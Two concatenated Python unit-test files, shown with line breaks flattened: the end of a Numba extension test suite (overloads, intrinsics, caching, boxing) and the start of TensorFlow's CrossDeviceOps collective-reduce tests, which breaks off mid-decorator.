(np.exp). @njit def test(): return np.exp(mydummy) self.assertEqual(test(), 0xDEADBEEF) def test_overload_method_stararg(self): @overload_method(MyDummyType, "method_stararg") def _ov_method_stararg(obj, val, val2, *args): def get(obj, val, val2, *args): return (val, val2, args) return get @njit def foo(obj, *args): # Test with expanding stararg return obj.method_stararg(*args) obj = MyDummy() self.assertEqual(foo(obj, 1, 2), (1, 2, ())) self.assertEqual(foo(obj, 1, 2, 3), (1, 2, (3,))) self.assertEqual(foo(obj, 1, 2, 3, 4), (1, 2, (3, 4))) @njit def bar(obj): # Test with explicit argument return ( obj.method_stararg(1, 2), obj.method_stararg(1, 2, 3), obj.method_stararg(1, 2, 3, 4), ) self.assertEqual( bar(obj), ((1, 2, ()), (1, 2, (3,)), (1, 2, (3, 4))), ) # Check cases that put tuple type into stararg # NOTE: the expected result has an extra tuple because of stararg. self.assertEqual( foo(obj, 1, 2, (3,)), (1, 2, ((3,),)), ) self.assertEqual( foo(obj, 1, 2, (3, 4)), (1, 2, ((3, 4),)), ) self.assertEqual( foo(obj, 1, 2, (3, (4, 5))), (1, 2, ((3, (4, 5)),)), ) def _assert_cache_stats(cfunc, expect_hit, expect_misses): hit = cfunc._cache_hits[cfunc.signatures[0]] if hit != expect_hit: raise AssertionError("cache not used") miss = cfunc._cache_misses[cfunc.signatures[0]] if miss != expect_misses: raise AssertionError("cache not used") class TestOverloadMethodCaching(TestCase): # Nested multiprocessing.Pool raises AssertionError: # "daemonic processes are not allowed to have children" _numba_parallel_test_ = False def test_caching_overload_method(self): self._cache_dir = temp_directory(self.__class__.__name__) with override_config("CACHE_DIR", self._cache_dir): self.run_caching_overload_method() def run_caching_overload_method(self): cfunc = jit(nopython=True, cache=True)(cache_overload_method_usecase) self.assertPreciseEqual(cfunc(MyDummy()), 13) _assert_cache_stats(cfunc, 0, 1) llvmir = cfunc.inspect_llvm((mydummy_type,)) # Ensure the inner method is not a declaration decls = [ ln for ln in llvmir.splitlines() if ln.startswith("declare") and "overload_method_length" in ln ] self.assertEqual(len(decls), 0) # Test in a separate process try: ctx = multiprocessing.get_context("spawn") except AttributeError: ctx = multiprocessing q = ctx.Queue() p = ctx.Process( target=run_caching_overload_method, args=(q, self._cache_dir) ) p.start() q.put(MyDummy()) p.join() # Ensure subprocess exited normally self.assertEqual(p.exitcode, 0) res = q.get(timeout=1) self.assertEqual(res, 13) def run_caching_overload_method(q, cache_dir): """ Used by TestOverloadMethodCaching.test_caching_overload_method """ with override_config("CACHE_DIR", cache_dir): arg = q.get() cfunc = jit(nopython=True, cache=True)(cache_overload_method_usecase) res = cfunc(arg) q.put(res) # Check cache stat _assert_cache_stats(cfunc, 1, 0) class TestIntrinsic(TestCase): def test_void_return(self): """ Verify that returning a None from codegen function is handled automatically for void functions, otherwise raise exception. """ @intrinsic def void_func(typingctx, a): sig = types.void(types.int32) def codegen(context, builder, signature, args): pass # do nothing, return None, should be turned into # dummy value return sig, codegen @intrinsic def non_void_func(typingctx, a): sig = types.int32(types.int32) def codegen(context, builder, signature, args): pass # oops, should be returning a value here, raise exception return sig, codegen @jit(nopython=True) def call_void_func(): void_func(1) return 0 @jit(nopython=True) def call_non_void_func(): non_void_func(1) return 0 # void func should work self.assertEqual(call_void_func(), 0) # not void function should raise exception with self.assertRaises(LoweringError) as e: call_non_void_func() self.assertIn("non-void function returns None", e.exception.msg) def test_ll_pointer_cast(self): """ Usecase test: custom reinterpret cast to turn int values to pointers """ from ctypes import CFUNCTYPE, POINTER, c_float, c_int # Use intrinsic to make a reinterpret_cast operation def unsafe_caster(result_type): assert isinstance(result_type, types.CPointer) @intrinsic def unsafe_cast(typingctx, src): self.assertIsInstance(typingctx, typing.Context) if isinstance(src, types.Integer): sig = result_type(types.uintp) # defines the custom code generation def codegen(context, builder, signature, args): [src] = args rtype = signature.return_type llrtype = context.get_value_type(rtype) return builder.inttoptr(src, llrtype) return sig, codegen return unsafe_cast # make a nopython function to use our cast op. # this is not usable from cpython due to the returning of a pointer. def unsafe_get_ctypes_pointer(src): raise NotImplementedError("not callable from python") @overload(unsafe_get_ctypes_pointer, strict=False) def array_impl_unsafe_get_ctypes_pointer(arrtype): if isinstance(arrtype, types.Array): unsafe_cast = unsafe_caster(types.CPointer(arrtype.dtype)) def array_impl(arr): return unsafe_cast(src=arr.ctypes.data) return array_impl # the ctype wrapped function for use in nopython mode def my_c_fun_raw(ptr, n): for i in range(n): print(ptr[i]) prototype = CFUNCTYPE(None, POINTER(c_float), c_int) my_c_fun = prototype(my_c_fun_raw) # Call our pointer-cast in a @jit compiled function and use # the pointer in a ctypes function @jit(nopython=True) def foo(arr): ptr = unsafe_get_ctypes_pointer(arr) my_c_fun(ptr, arr.size) # Test arr = np.arange(10, dtype=np.float32) with captured_stdout() as buf: foo(arr) got = buf.getvalue().splitlines() buf.close() expect = list(map(str, arr)) self.assertEqual(expect, got) def test_serialization(self): """ Test serialization of intrinsic objects """ # define a intrinsic @intrinsic def identity(context, x): def codegen(context, builder, signature, args): return args[0] sig = x(x) return sig, codegen # use in a jit function @jit(nopython=True) def foo(x): return identity(x) self.assertEqual(foo(1), 1) # get serialization memo memo = _Intrinsic._memo memo_size = len(memo) # pickle foo and check memo size serialized_foo = pickle.dumps(foo) # increases the memo size memo_size += 1 self.assertEqual(memo_size, len(memo)) # unpickle foo_rebuilt = pickle.loads(serialized_foo) self.assertEqual(memo_size, len(memo)) # check rebuilt foo self.assertEqual(foo(1), foo_rebuilt(1)) # pickle identity directly serialized_identity = pickle.dumps(identity) # memo size unchanged self.assertEqual(memo_size, len(memo)) # unpickle identity_rebuilt = pickle.loads(serialized_identity) # must be the same object self.assertIs(identity, identity_rebuilt) # memo size unchanged self.assertEqual(memo_size, len(memo)) def test_deserialization(self): """ Test deserialization of intrinsic """ def defn(context, x): def codegen(context, builder, signature, args): return args[0] return x(x), codegen memo = _Intrinsic._memo memo_size = len(memo) # invoke _Intrinsic indirectly to avoid registration which keeps an # internal reference inside the compiler original = _Intrinsic("foo", defn) self.assertIs(original._defn, defn) pickled = pickle.dumps(original) # by pickling, a new memo entry is created memo_size += 1 self.assertEqual(memo_size, len(memo)) del original # remove original before unpickling # by deleting, the memo entry is NOT removed due to recent # function queue self.assertEqual(memo_size, len(memo)) # Manually force clear of _recent queue _Intrinsic._recent.clear() memo_size -= 1 self.assertEqual(memo_size, len(memo)) rebuilt = pickle.loads(pickled) # verify that the rebuilt object is different self.assertIsNot(rebuilt._defn, defn) # the second rebuilt object is the same as the first second = pickle.loads(pickled) self.assertIs(rebuilt._defn, second._defn) def test_docstring(self): @intrinsic def void_func(typingctx, a: int): """void_func docstring""" sig = types.void(types.int32) def codegen(context, builder, signature, args): pass # do nothing, return None, should be turned into # dummy value return sig, codegen self.assertEqual("numba.tests.test_extending", void_func.__module__) self.assertEqual("void_func", void_func.__name__) self.assertEqual("TestIntrinsic.test_docstring.<locals>.void_func", void_func.__qualname__) self.assertDictEqual({'a': int}, void_func.__annotations__) self.assertEqual("void_func docstring", void_func.__doc__) class TestRegisterJitable(unittest.TestCase): def test_no_flags(self): @register_jitable def foo(x, y): return x + y def bar(x, y): return foo(x, y) cbar = jit(nopython=True)(bar) expect = bar(1, 2) got = cbar(1, 2) self.assertEqual(expect, got) def test_flags_no_nrt(self): @register_jitable(_nrt=False) def foo(n): return np.arange(n) def bar(n): return foo(n) self.assertEqual(bar(3).tolist(), [0, 1, 2]) cbar = jit(nopython=True)(bar) with self.assertRaises(errors.TypingError) as raises: cbar(2) msg = ( "Only accept returning of array passed into the function as " "argument" ) self.assertIn(msg, str(raises.exception)) class TestImportCythonFunction(unittest.TestCase): @unittest.skipIf(sc is None, "Only run if SciPy >= 0.19 is installed") def test_getting_function(self): addr = get_cython_function_address( "scipy.special.cython_special", "j0" ) functype = ctypes.CFUNCTYPE(ctypes.c_double, ctypes.c_double) _j0 = functype(addr) j0 = jit(nopython=True)(lambda x: _j0(x)) self.assertEqual(j0(0), 1) def test_missing_module(self): with self.assertRaises(ImportError) as raises: get_cython_function_address("fakemodule", "fakefunction") # The quotes are not there in Python 2 msg = "No module named '?fakemodule'?" match = re.match(msg, str(raises.exception)) self.assertIsNotNone(match) @unittest.skipIf(sc is None, "Only run if SciPy >= 0.19 is installed") def test_missing_function(self): with self.assertRaises(ValueError) as raises: get_cython_function_address( "scipy.special.cython_special", "foo" ) msg = ( "No function 'foo' found in __pyx_capi__ of " "'scipy.special.cython_special'" ) self.assertEqual(msg, str(raises.exception)) @overload_method( MyDummyType, "method_jit_option_check_nrt", jit_options={"_nrt": True} ) def ov_method_jit_option_check_nrt(obj): def imp(obj): return np.arange(10) return imp @overload_method( MyDummyType, "method_jit_option_check_no_nrt", jit_options={"_nrt": False} ) def ov_method_jit_option_check_no_nrt(obj): def imp(obj): return np.arange(10) return imp @overload_attribute( MyDummyType, "attr_jit_option_check_nrt", jit_options={"_nrt": True} ) def ov_attr_jit_option_check_nrt(obj): def imp(obj): return np.arange(10) return imp @overload_attribute( MyDummyType, "attr_jit_option_check_no_nrt", jit_options={"_nrt": False} ) def ov_attr_jit_option_check_no_nrt(obj): def imp(obj): return np.arange(10) return imp class TestJitOptionsNoNRT(TestCase): # Test overload*(jit_options={...}) by turning off _nrt def check_error_no_nrt(self, func, *args, **kwargs): # Check that the compilation fails with a complaint about dynamic array msg = ( "Only accept returning of array passed into " "the function as argument" ) with self.assertRaises(errors.TypingError) as raises: func(*args, **kwargs) self.assertIn(msg, str(raises.exception)) def no_nrt_overload_check(self, flag): def dummy(): return np.arange(10) @overload(dummy, jit_options={"_nrt": flag}) def ov_dummy(): def dummy(): return np.arange(10) return dummy @njit def foo(): return dummy() if flag: self.assertPreciseEqual(foo(), np.arange(10)) else: self.check_error_no_nrt(foo) def test_overload_no_nrt(self): self.no_nrt_overload_check(True) self.no_nrt_overload_check(False) def test_overload_method_no_nrt(self): @njit def udt(x): return x.method_jit_option_check_nrt() self.assertPreciseEqual(udt(mydummy), np.arange(10)) @njit def udt(x): return x.method_jit_option_check_no_nrt() self.check_error_no_nrt(udt, mydummy) def test_overload_attribute_no_nrt(self): @njit def udt(x): return x.attr_jit_option_check_nrt self.assertPreciseEqual(udt(mydummy), np.arange(10)) @njit def udt(x): return x.attr_jit_option_check_no_nrt self.check_error_no_nrt(udt, mydummy) class TestBoxingCallingJIT(TestCase): def setUp(self): super().setUp() many = base_dummy_type_factory("mydummy2") self.DynTypeType, self.DynType, self.dyn_type_type = many self.dyn_type = self.DynType() def test_unboxer_basic(self): # Implements an unboxer on DynType that calls an intrinsic into the # unboxer code. magic_token = 0xCAFE magic_offset = 123 @intrinsic def my_intrinsic(typingctx, val): # An intrinsic that returns `val + magic_offset` def impl(context, builder, sig, args): [val] = args return builder.add(val, val.type(magic_offset)) sig = signature(val, val) return sig, impl @unbox(self.DynTypeType) def unboxer(typ, obj, c): # The unboxer that calls some jitcode def bridge(x): # proof that this is a jit'ed context by calling jit only # intrinsic return my_intrinsic(x) args = [c.context.get_constant(types.intp, magic_token)] sig = signature(types.voidptr, types.intp) is_error, res = c.pyapi.call_jit_code(bridge, sig, args) return NativeValue(res, is_error=is_error) @box(self.DynTypeType) def boxer(typ, val, c): # The boxer that returns an integer representation res = c.builder.ptrtoint(val, cgutils.intp_t) return c.pyapi.long_from_ssize_t(res) @njit def passthru(x): return x out = passthru(self.dyn_type) self.assertEqual(out, magic_token + magic_offset) def test_unboxer_raise(self): # Testing exception raising in jitcode called from unboxing. @unbox(self.DynTypeType) def unboxer(typ, obj, c): # The unboxer that calls some jitcode def bridge(x): if x > 0: raise ValueError("cannot be x > 0") return x args = [c.context.get_constant(types.intp, 1)] sig = signature(types.voidptr, types.intp) is_error, res = c.pyapi.call_jit_code(bridge, sig, args) return NativeValue(res, is_error=is_error) @box(self.DynTypeType) def boxer(typ, val, c): # The boxer that returns an integer representation res = c.builder.ptrtoint(val, cgutils.intp_t) return c.pyapi.long_from_ssize_t(res) @njit def passthru(x): return x with self.assertRaises(ValueError) as raises: passthru(self.dyn_type) self.assertIn( "cannot be x > 0", str(raises.exception), ) def test_boxer(self): # Call jitcode inside the boxer magic_token = 0xCAFE magic_offset = 312 @intrinsic def my_intrinsic(typingctx, val): # An intrinsic that returns `val + magic_offset` def impl(context, builder, sig, args): [val] = args return builder.add(val, val.type(magic_offset)) sig = signature(val, val) return sig, impl @unbox(self.DynTypeType) def unboxer(typ, obj, c): return NativeValue(c.context.get_dummy_value()) @box(self.DynTypeType) def boxer(typ, val, c): # Note: this doesn't do proper error handling def bridge(x): return my_intrinsic(x) args = [c.context.get_constant(types.intp, magic_token)] sig = signature(types.intp, types.intp) is_error, res = c.pyapi.call_jit_code(bridge, sig, args) return c.pyapi.long_from_ssize_t(res) @njit def passthru(x): return x r = passthru(self.dyn_type) self.assertEqual(r, magic_token + magic_offset) def test_boxer_raise(self): # Call jitcode inside the boxer @unbox(self.DynTypeType) def unboxer(typ, obj, c): return NativeValue(c.context.get_dummy_value()) @box(self.DynTypeType) def boxer(typ, val, c): def bridge(x): if x > 0: raise ValueError("cannot do x > 0") return x args = [c.context.get_constant(types.intp, 1)] sig = signature(types.intp, types.intp) is_error, res = c.pyapi.call_jit_code(bridge, sig, args) # The error handling retval = cgutils.alloca_once(c.builder, c.pyapi.pyobj, zfill=True) with c.builder.if_then(c.builder.not_(is_error)): obj = c.pyapi.long_from_ssize_t(res) c.builder.store(obj, retval) return c.builder.load(retval) @njit def passthru(x): return x with self.assertRaises(ValueError) as raises: passthru(self.dyn_type) self.assertIn( "cannot do x > 0", str(raises.exception), ) def with_objmode_cache_ov_example(x): # This is the function stub for overloading inside # TestCachingOverloadObjmode.test_caching_overload_objmode pass class TestCachingOverloadObjmode(TestCase): """Test caching of the use of overload implementations that use `with objmode` """ _numba_parallel_test_ = False def setUp(self): warnings.simplefilter("error", errors.NumbaWarning) def tearDown(self): warnings.resetwarnings() def test_caching_overload_objmode(self): cache_dir = temp_directory(self.__class__.__name__) with override_config("CACHE_DIR", cache_dir): def realwork(x): # uses numpy code arr = np.arange(x) / x return np.linalg.norm(arr) def python_code(x): # create indirections return realwork(x) @overload(with_objmode_cache_ov_example) def _ov_with_objmode_cache_ov_example(x): def impl(x): with objmode(y="float64"): y = python_code(x) return y return impl @njit(cache=True) def testcase(x): return with_objmode_cache_ov_example(x) expect = realwork(123) got = testcase(123) self.assertEqual(got, expect) testcase_cached = njit(cache=True)(testcase.py_func) got = testcase_cached(123) self.assertEqual(got, expect) @classmethod def check_objmode_cache_ndarray(cls): def do_this(a, b): return np.sum(a + b) def do_something(a, b): return np.sum(a + b) @overload(do_something) def overload_do_something(a, b): def _do_something_impl(a, b): with objmode(y='float64'): y = do_this(a, b) return y return _do_something_impl @njit(cache=True) def test_caching(): a = np.arange(20) b = np.arange(20) return do_something(a, b) got = test_caching() expect = test_caching.py_func() # Check result if got != expect: raise AssertionError("incorrect result") return test_caching @classmethod def check_objmode_cache_ndarray_check_cache(cls): disp = cls.check_objmode_cache_ndarray() if len(disp.stats.cache_misses) != 0: raise AssertionError('unexpected cache miss') if len(disp.stats.cache_hits) <= 0: raise AssertionError("unexpected missing cache hit") def test_check_objmode_cache_ndarray(self): # See issue #6130. # Env is missing after cache load. cache_dir = temp_directory(self.__class__.__name__) with override_config("CACHE_DIR", cache_dir): # Test in local process to populate the cache. self.check_objmode_cache_ndarray() # Run in new process to use the cache in a fresh process. res = run_in_new_process_in_cache_dir( self.check_objmode_cache_ndarray_check_cache, cache_dir ) self.assertEqual(res['exitcode'], 0) class TestMisc(TestCase): def test_is_jitted(self): def foo(x): pass self.assertFalse(is_jitted(foo)) self.assertTrue(is_jitted(njit(foo))) self.assertFalse(is_jitted(vectorize(foo))) self.assertFalse(is_jitted(vectorize(parallel=True)(foo))) self.assertFalse( is_jitted(guvectorize("void(float64[:])", "(m)")(foo)) ) class TestOverloadPreferLiteral(TestCase): def test_overload(self): def prefer_lit(x): pass def non_lit(x): pass def ov(x): if isinstance(x, types.IntegerLiteral): # With prefer_literal=False, this branch will not be reached. if x.literal_value == 1: def impl(x): return 0xcafe return impl else: raise errors.TypingError('literal value') else: def impl(x): return x * 100 return impl overload(prefer_lit, prefer_literal=True)(ov) overload(non_lit)(ov) @njit def check_prefer_lit(x): return prefer_lit(1), prefer_lit(2), prefer_lit(x) a, b, c = check_prefer_lit(3) self.assertEqual(a, 0xcafe) self.assertEqual(b, 200) self.assertEqual(c, 300) @njit def check_non_lit(x): return non_lit(1), non_lit(2), non_lit(x) a, b, c = check_non_lit(3) self.assertEqual(a, 100) self.assertEqual(b, 200) self.assertEqual(c, 300) def test_overload_method(self): def ov(self, x): if isinstance(x, types.IntegerLiteral): # With prefer_literal=False, this branch will not be reached. if x.literal_value == 1: def impl(self, x): return 0xcafe return impl else: raise errors.TypingError('literal value') else: def impl(self, x): return x * 100 return impl overload_method( MyDummyType, "method_prefer_literal", prefer_literal=True, )(ov) overload_method( MyDummyType, "method_non_literal", prefer_literal=False, )(ov) @njit def check_prefer_lit(dummy, x): return ( dummy.method_prefer_literal(1), dummy.method_prefer_literal(2), dummy.method_prefer_literal(x), ) a, b, c = check_prefer_lit(MyDummy(), 3) self.assertEqual(a, 0xcafe) self.assertEqual(b, 200) self.assertEqual(c, 300) @njit def check_non_lit(dummy, x): return ( dummy.method_non_literal(1), dummy.method_non_literal(2), dummy.method_non_literal(x), ) a, b, c = check_non_lit(MyDummy(), 3) self.assertEqual(a, 100) self.assertEqual(b, 200) self.assertEqual(c, 300) if __name__ == "__main__": unittest.main()
cross_device_ops_test.py
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for CrossDeviceOps.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import os import threading import time from absl.testing import parameterized from tensorflow.core.protobuf import config_pb2 from tensorflow.core.protobuf import tensorflow_server_pb2 from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib from tensorflow.python.distribute import collective_util from tensorflow.python.distribute import combinations from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib from tensorflow.python.distribute import cross_device_utils from tensorflow.python.distribute import device_util from tensorflow.python.distribute import multi_process_runner from tensorflow.python.distribute import multi_worker_test_base from tensorflow.python.distribute import reduce_util from tensorflow.python.distribute import test_util from tensorflow.python.distribute import values as value_lib from tensorflow.python.eager import context from tensorflow.python.eager import def_function from tensorflow.python.eager import test from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import indexed_slices from tensorflow.python.framework import ops from tensorflow.python.ops import array_ops from tensorflow.python.ops import collective_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import math_ops from tensorflow.python.util import nest CollectiveReplicaLauncher = cross_device_utils.CollectiveReplicaLauncher CommunicationImplementation = collective_util.CommunicationImplementation ReduceOp = reduce_util.ReduceOp IndexedSlicesValue = indexed_slices.IndexedSlicesValue IndexedSlices = indexed_slices.IndexedSlices def make_per_replica_value(value, devices): """Creates a `PerReplica` object whose values reside in `devices`. Args: value: a tensor-convertible value or a `IndexedSlicesValue`, or a callable that takes one argument (`device_idx`) and should return the value that is going to be created on devices[device_idx]. devices: a list of device strings to create `PerReplica` values on. Returns: A `PerReplica` object. """ values = [] for device_idx, device in enumerate(devices): if callable(value): v = value(device_idx) elif isinstance(value, list): v = value[device_idx] else: v = value if isinstance(v, IndexedSlicesValue): with ops.device(device): values.append( IndexedSlices( values=array_ops.identity(v.values), indices=array_ops.identity(v.indices), dense_shape=array_ops.identity(v.dense_shape))) else: with ops.device(device): values.append(array_ops.identity(v)) return value_lib.PerReplica(values) def enable_collective_ops(): """Enable collectives in the current process.""" cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver() context.context().configure_collective_ops( collective_leader="'/job:worker/replica:0/task:0'") config_proto = config_pb2.ConfigProto() config_proto.experimental.collective_group_leader = ( "/job:worker/replica:0/task:0") server_def = tensorflow_server_pb2.ServerDef( cluster=cluster_resolver.cluster_spec().as_cluster_def(), default_session_config=config_proto, job_name=cluster_resolver.task_type, task_index=cluster_resolver.task_id, protocol=cluster_resolver.rpc_layer) context.context().enable_collective_ops(server_def) # Recover default flag values. CollectiveReplicaLauncher._prefer_unique_instance_key = True CollectiveReplicaLauncher._prefer_ordering_token = False class MultiProcessPoolRunner(): def __init__(self, num_processes): cluster_spec_dict = multi_worker_test_base.create_cluster_spec( num_workers=num_processes) self.runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec_dict) # Global MultiProcessPoolRunners that can be shared by test cases to avoid # expensive initialization cost of TensorFlow in new processes. # # Note that they have to be globals and can't be owned by test classes because # usually fn usually captures the test class instance, and test class # instance can't be pickled if it has mpr as a member (it is not allowed to # pickle Process objects). # TODO(crccw): Use `num_workers` combination once it is ready. global_mpr_2p = MultiProcessPoolRunner(num_processes=2) global_mpr_1p = MultiProcessPoolRunner(num_processes=1) def get_global_mpr(num_processes): if num_processes == 1: return global_mpr_1p.runner elif num_processes == 2: return global_mpr_2p.runner else: raise ValueError("get_global_mpr: num_processes must be 1 or 2, got %d" % num_processes) class CollectiveOpsTest(test.TestCase, parameterized.TestCase): def setUp(self): super().setUp() # Enabling collectives can be done in "setUpClass", but requires using # different collective_keys in different tests as collectives are reused # across tests. Always resetting collective ops before each test offers # better test isolation. global_mpr_1p.runner.run(enable_collective_ops) global_mpr_2p.runner.run(enable_collective_ops) def make_collective(self, num_processes, gpu_per_process): """Returns collectives and other info to be used in tests. Args: num_processes: an integer indicating the number of processes that participate in the collective. gpu_per_process: number of GPUs (0 if no GPUs) used by each process. Returns: A tuple of (collective, devices, pid) where collective is a instance of `CollectiveAllReduce`, devices are a list of local devices (str) attached to the current process, and pid is the id of this process among all participant processes. """ cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver() devices = [ "/job:worker/replica:0/task:%d/device:CPU:0" % cluster_resolver.task_id ] if gpu_per_process > 0: devices = [ "/job:worker/replica:0/task:%d/device:GPU:%d" % (cluster_resolver.task_id, i) for i in range(gpu_per_process) ] group_size = num_processes * len(devices) collective = cross_device_ops_lib.CollectiveAllReduce( devices=devices, group_size=group_size) return collective, devices, cluster_resolver.task_id def as_list(self, value): """An utility to convert a `Mirrored`, `Tensor` or `IndexedSlices` to a list. The reason it exists is to provide a uniformed view of returned value of "reduce" calls, especially across tf.function boundaries. Returning `Mirrored` from a tf.function will only evaluate the primary value, which makes collective ops of non-primary device being pruned, and will eventually cause hanging. Args: value: the value to convert, can be one of `Mirrored`, `Tensor` and `IndexedSlices`. Returns: A list of `Tensor` or `IndexedSlices`. """ if isinstance(value, ops.Tensor): return [value] elif isinstance(value, IndexedSlices): return [value] elif isinstance(value, value_lib.Mirrored): return value.values else: raise ValueError("unwrap: unsupported input type: %s" % type(value)) RunOptions = collections.namedtuple( # pylint: disable=invalid-name "RunOptions", [ "mode", # A list of str from ["eager", "func_graph"] "num_processes", "gpus_per_process", "reduce_op", "communication_options", "prefer_unique_instance_key", ]) RunOptions.__new__.__defaults__ = (["eager", "func_graph"], 2, 0, ReduceOp.SUM, collective_util.Options(), True) def reduce_and_verify(self, inputs, expect, options): """Reduce the given `inputs` and verify the output matches `expect`. Args: inputs: a list of `Tensor` or `IndexedSlices`, where i-th value will be fed to i-th replica. expect: a `Tensor` or `IndexedSlices`. This should be the expected value for one replica. options: a `RunOpotions` instance. """ def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( options.prefer_unique_instance_key) collective, devices, pid = self.make_collective(options.num_processes, options.gpus_per_process) def reduce_fn(): value_fn = lambda device_idx: inputs[pid * len(devices) + device_idx] per_replica_value = make_per_replica_value(value_fn, devices) reduced_values = collective.reduce(options.reduce_op, per_replica_value, per_replica_value, options.communication_options) if options.gpus_per_process > 1: self.assertIsInstance(reduced_values, value_lib.Mirrored) reduced_values = self.as_list(reduced_values) self.assertAllEqual(devices, [v.device for v in reduced_values]) return [ops.convert_to_tensor(v) for v in reduced_values] per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices) if "eager" in options.mode: got = reduce_fn() self.assertAllClose(got, per_replica_expect) if "func_graph" in options.mode: got = def_function.function(reduce_fn)() self.assertAllClose(got, per_replica_expect) get_global_mpr(options.num_processes).run(replica_fn) def batch_reduce_and_verify(self, inputs, expect, options): """Batch reduce the given `inputs` and verify the output matches `expect`. Args: inputs: a 2-level nested list of `Tensor` or `IndexedSlices`, where i-th value will be fed to i-th replica. expect: a list of `Tensor` or `IndexedSlices`. This should be the expected value for one replica. options: a `RunOpotions` instance. """ def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( options.prefer_unique_instance_key) collective, devices, pid = self.make_collective(options.num_processes, options.gpus_per_process) def batch_reduce_fn(): batch_size = len(inputs[0]) value_dst_pairs = [] for i in range(batch_size): def value_fn(device_idx, idx=i): return inputs[pid * len(devices) + device_idx][idx] per_replica_value = make_per_replica_value(value_fn, devices) value_dst_pairs.append((per_replica_value, per_replica_value)) reduced_values = collective.batch_reduce(options.reduce_op, value_dst_pairs, options.communication_options) if options.gpus_per_process > 1: for v in reduced_values: self.assertIsInstance(v, value_lib.Mirrored) reduced_values = [self.as_list(v) for v in reduced_values] for v in reduced_values: self.assertAllEqual(devices, [t.device for t in v]) return nest.map_structure(ops.convert_to_tensor, reduced_values) per_replica_expect = nest.map_structure( lambda x: [ops.convert_to_tensor(x)] * len(devices), expect) if "eager" in options.mode: got = batch_reduce_fn() self.assertAllClose(got, per_replica_expect) if "func_graph" in options.mode: got = def_function.function(batch_reduce_fn)() self.assertAllClose(got, per_replica_expect) get_global_mpr(options.num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=[1, 2], required_gpus=[0, 1, 2], implementation=[ CommunicationImplementation.AUTO, CommunicationImplementation.RING, CommunicationImplementation.NCCL, ], reduce_op=[ReduceOp.SUM, ReduceOp.MEAN], prefer_unique_instance_key=[True, False])) def testReduceDense(self, num_processes, required_gpus, implementation, reduce_op, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") if (num_processes == 2 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip NCCL + 2 processes combination. NCCL requires " "physical GPUs for every process.") options = self.RunOptions( num_processes=num_processes, gpus_per_process=required_gpus, reduce_op=reduce_op, communication_options=collective_util.Options( implementation=implementation), prefer_unique_instance_key=prefer_unique_instance_key) group_size = options.num_processes * (options.gpus_per_process or 1) inputs_data = [1.0, 2.0, 3.0, 4.0] inputs = inputs_data[0:group_size] if group_size == 1: expect = 1.0 if group_size == 2: expect = 3.0 if reduce_op == ReduceOp.SUM else 1.5 elif group_size == 4: expect = 10.0 if reduce_op == ReduceOp.SUM else 2.5 self.reduce_and_verify(inputs, expect, options) @combinations.generate( combinations.combine( num_processes=[1, 2], required_gpus=[0, 1, 2], implementation=[ CommunicationImplementation.AUTO, CommunicationImplementation.RING, CommunicationImplementation.NCCL, ], # TODO(b/166682130): add MEAN reduce once the bug is fixed. reduce_op=ReduceOp.SUM, prefer_unique_instance_key=[True, False])) def testReduceSparse(self, num_processes, required_gpus, implementation, reduce_op, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") if (num_processes == 2 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip NCCL + 2 processes combination. NCCL requires " "physical GPUs for every process.") options = self.RunOptions( mode=["func_graph"], # Sparse reduce is not supported in eager. num_processes=num_processes, gpus_per_process=required_gpus, reduce_op=reduce_op, communication_options=collective_util.Options( implementation=implementation), prefer_unique_instance_key=prefer_unique_instance_key) group_size = options.num_processes * (options.gpus_per_process or 1) inputs_data = [ IndexedSlicesValue( values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]), IndexedSlicesValue( values=[[3.], [4.]], indices=[1, 2], dense_shape=[10, 1]), IndexedSlicesValue( values=[[5.], [6.]], indices=[7, 8], dense_shape=[10, 1]), IndexedSlicesValue( values=[[7.], [8.]], indices=[3, 2], dense_shape=[10, 1]), ] inputs = inputs_data[0:group_size] if group_size == 1: expect = IndexedSlices( values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]) elif group_size == 2: expect = IndexedSlices( values=[[1.], [2.], [3.], [4.]], indices=[0, 1, 1, 2], dense_shape=[10, 1]) elif group_size == 4: expect = IndexedSlices( values=[[1.], [2.], [3.], [4.], [5.], [6.], [7.], [8.]], indices=[0, 1, 1, 2, 7, 8, 3, 2], dense_shape=[10, 1]) self.reduce_and_verify(inputs, expect, options) @combinations.generate( combinations.combine(prefer_unique_instance_key=[True, False])) def testReduceSparseVariableLength(self, prefer_unique_instance_key): # One device per process, 2 processes, 2 replicas in total. inputs = [ IndexedSlicesValue(values=[[1.]], indices=[0], dense_shape=[10, 1]), IndexedSlicesValue( values=[[2.], [3.], [4.]], indices=[0, 1, 2], dense_shape=[10, 1]), ] expect = IndexedSlices( values=[[1.], [2.], [3.], [4.]], indices=[0, 0, 1, 2], dense_shape=[10, 1]) self.reduce_and_verify( inputs, expect, self.RunOptions( mode=["func_graph"], # Sparse reduce is not supported in eager. num_processes=2, reduce_op=ReduceOp.SUM, prefer_unique_instance_key=prefer_unique_instance_key)) @combinations.generate( combinations.combine( num_processes=[1, 2], required_gpus=[0, 1, 2], implementation=[ 